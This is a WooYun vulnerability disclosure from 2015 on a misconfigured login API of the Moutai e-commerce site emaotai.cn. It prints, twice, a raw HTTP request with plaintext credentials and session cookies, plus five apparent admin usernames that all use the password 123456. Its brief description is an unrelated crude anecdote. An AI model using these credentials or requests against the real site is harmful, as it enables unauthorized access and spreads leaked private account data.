当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154033

漏洞标题:茅台电商某处设置不当导致管理账号泄露

相关厂商:emaotai.cn

漏洞作者: 路人甲

提交时间:2015-11-18 17:39

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:网络设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-18: 细节已通知厂商并且等待厂商处理中
2015-11-19: 厂商已经确认,细节仅向厂商公开
2015-11-29: 细节向核心白帽子及相关领域专家公开
2015-12-09: 细节向普通白帽子公开
2015-12-19: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

小时候最恶心的一件事。发高烧去看医生(农村的小诊所)。医生拿着温度计插进我腚内,过会儿拔出来观察了一下没有异常,甩了甩。叫我张开嘴,又插进我嘴里让我含着~~现在想想当时我脑子是不是坏掉了

详细说明:

1.jpg

2.jpg


GET /oAPI/API/eCenter/safe/getlogin?userlogin=liutao&userpass=123456 HTTP/1.1
Host: www.emaotai.cn:90
Proxy-Connection: keep-alive
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.154 Safari/537.36 LBBROWSER
loginid: null
Referer: http://www.emaotai.cn:90/ht/login.html
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_3b97352bf7acd895b6c95cdc51ade387=1447755208; Hm_lpvt_3b97352bf7acd895b6c95cdc51ade387=1447755208; VerifyCode=KPI3QlOXg98k3sDapcXS/w==; BrowedProductList-Admin=%3c%3fxml+version%3d%221.0%22+encoding%3d%22utf-16%22%3f%3e%0d%0a%3cArrayOfInt+xmlns%3axsi%3d%22http%3a%2f%2fwww.w3.org%2f2001%2fXMLSchema-instance%22+xmlns%3axsd%3d%22http%3a%2f%2fwww.w3.org%2f2001%2fXMLSchema%22%3e%0d%0a++%3cint%3e363%3c%2fint%3e%0d%0a%3c%2fArrayOfInt%3e; ASP.NET_SessionId=ktz0jl1uqzzidnusgh13k41j; SERVERID=b2eb304dd4c0d90f5533b418d68c8af8|1447755640|1447755207
Connection: close


liutao/123456
wangxu/123456
zhangjing/123456
zhangbin/123456
wanghao/123456

漏洞证明:

1.jpg

2.jpg


GET /oAPI/API/eCenter/safe/getlogin?userlogin=liutao&userpass=123456 HTTP/1.1
Host: www.emaotai.cn:90
Proxy-Connection: keep-alive
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.154 Safari/537.36 LBBROWSER
loginid: null
Referer: http://www.emaotai.cn:90/ht/login.html
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_3b97352bf7acd895b6c95cdc51ade387=1447755208; Hm_lpvt_3b97352bf7acd895b6c95cdc51ade387=1447755208; VerifyCode=KPI3QlOXg98k3sDapcXS/w==; BrowedProductList-Admin=%3c%3fxml+version%3d%221.0%22+encoding%3d%22utf-16%22%3f%3e%0d%0a%3cArrayOfInt+xmlns%3axsi%3d%22http%3a%2f%2fwww.w3.org%2f2001%2fXMLSchema-instance%22+xmlns%3axsd%3d%22http%3a%2f%2fwww.w3.org%2f2001%2fXMLSchema%22%3e%0d%0a++%3cint%3e363%3c%2fint%3e%0d%0a%3c%2fArrayOfInt%3e; ASP.NET_SessionId=ktz0jl1uqzzidnusgh13k41j; SERVERID=b2eb304dd4c0d90f5533b418d68c8af8|1447755640|1447755207
Connection: close


liutao/123456
wangxu/123456
zhangjing/123456
zhangbin/123456
wanghao/123456


修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-11-19 08:42

厂商回复:

感谢你的反馈,我们将会尽快修复。

最新状态:

暂无